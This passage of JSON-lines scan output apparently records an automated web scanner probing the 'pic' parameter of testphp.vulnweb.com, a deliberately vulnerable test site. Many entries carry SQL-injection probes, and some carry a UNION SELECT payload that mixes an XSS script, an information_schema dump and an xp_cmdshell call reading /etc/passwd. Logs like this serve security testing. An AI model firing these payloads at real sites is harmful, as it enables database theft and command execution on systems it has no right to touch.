details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%206010%3D6010%20AND%20%28%27XKAt%27%3D%27XKAt\",\"time\":\"353.388933ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.359092924Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27RlgMOs%3C%27%22%3EawFsnQ\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27RlgMOs%3C%27%22%3EawFsnQ\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27RlgMOs%3C%27%22%3EawFsnQ\",\"time\":\"343.608532ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.371232661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%207497%3D8900%20AND%20%28%27NpnM%27%3D%27NpnM\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%207497%3D8900%20AND%20%28%27NpnM%27%3D%27NpnM\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%207497%3D8900%20AND%20%28%27NpnM%27%3D%27NpnM\",\"time\":\"361.6385ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.691140776Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%203528%3D3909%20AND%20%285518%3D5518\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%203528%3D3909%20AND%20%285518%3D5518\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%203528%3D3909%20AND%20%285518%3D5518\",\"time\":\"354.99241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.730322686Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%206010%3D6010%20AND%20%281432%3D1432\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%206010%3D6010%20AND%20%281432%3D1432\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%29%20AND%206010%3D6010%20AND%20%281432%3D1432\",\"time\":\"344.411761ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.739962498Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\\u0026otIR=9374%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\\u0026otIR=9374%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\\u0026otIR=9374%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"353.234438ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.815251962Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%29%20AND%206956%3D6956%20AND%20%285477%3D5477\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%29%20AND%206956%3D6956%20AND%20%285477%3D5477\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%29%20AND%206956%3D6956%20AND%20%285477%3D5477\",\"time\":\"358.649016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.862465386Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%29%20AND%209227%3D5157%20AND%20%281871%3D1871\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%29%20AND%209227%3D5157%20AND%20%281871%3D1871\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%29%20AND%209227%3D5157%20AND%20%281871%3D1871\",\"time\":\"350.132054ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.973880183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1\\u0026tdRI=6587%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1\\u0026tdRI=6587%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1\\u0026tdRI=6587%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"348.924741ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":655,\"lines\":117,\"status_code\":200,\"content_length\":6428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.009085696Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1.%29...%28.%27%28%22\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1.%29...%28.%27%28%22\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1.%29...%28.%27%28%22\",\"time\":\"352.461745ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.086972563Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=11\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=11\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=11\",\"time\":\"356.194176ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.15236375Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1813\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1813\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1813\",\"time\":\"349.061948ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.205385915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1822\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1822\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1822\",\"time\":\"345.812018ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.295498877Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1854\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1854\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1854\",\"time\":\"348.088782ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:48.374643088Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1A01\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1A01\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1A01\",\"time\":\"342.995376ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:51.61440832Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1Attack\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1Attack\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1Attack\",\"time\":\"355.712298ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:51.747482418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1Current\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1Current\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1Current\",\"time\":\"348.625114ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:51.841196429Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1Database\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1Database\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1Database\",\"time\":\"348.771916ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:51.884255691Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1Exploit\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1Exploit\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1Exploit\",\"time\":\"344.448185ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:52.232311842Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=2\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=2\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=2\",\"time\":\"352.234699ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":646,\"lines\":117,\"status_code\":200,\"content_length\":6368,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:52.657545694Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3\",\"time\":\"352.919907ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":652,\"lines\":117,\"status_code\":200,\"content_length\":6401,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:52.687012087Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3%22.%28%28.%27%2C%28.%29\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3%22.%28%28.%27%2C%28.%29\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3%22.%28%28.%27%2C%28.%29\",\"time\":\"352.99741ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:52.861197678Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3%22..%28%28.%27.%29.\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3%22..%28%28.%27.%29.\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3%22..%28%28.%27.%29.\",\"time\":\"340.230699ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:53.374338314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3%27lLbpfv%3C%27%22%3EXFnqDB\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3%27lLbpfv%3C%27%22%3EXFnqDB\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3%27lLbpfv%3C%27%22%3EXFnqDB\",\"time\":\"343.727303ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:53.496028725Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3%29%20AND%202325%3D2325%20AND%20%281453%3D1453\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3%29%20AND%202325%3D2325%20AND%20%281453%3D1453\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3%29%20AND%202325%3D2325%20AND%20%281453%3D1453\",\"time\":\"348.818729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:55.155593135Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3%29%20AND%204294%3D2769%20AND%20%281005%3D1005\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3%29%20AND%204294%3D2769%20AND%20%281005%3D1005\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3%29%20AND%204294%3D2769%20AND%20%281005%3D1005\",\"time\":\"358.332218ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:56.460128716Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=3\\u0026hkNi=3073%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=3\\u0026hkNi=3073%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3\\u0026hkNi=3073%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29\",\"time\":\"350.655235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":652,\"lines\":117,\"status_code\":200,\"content_length\":6401,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:56.478975593Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=4\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=4\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=4\",\"time\":\"362.225671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":118,\"status_code\":200,\"content_length\":6453,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:56.801436362Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=4135\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=4135\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=4135\",\"time\":\"351.195005ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:57.671499463Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=5\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=5\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=5\",\"time\":\"346.26976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":648,\"lines\":116,\"status_code\":200,\"content_length\":6382,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:57.685543915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=6\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=6\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=6\",\"time\":\"340.168151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":118,\"status_code\":200,\"content_length\":6454,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:57.732487918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=7\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=7\",\"title\":\"picture 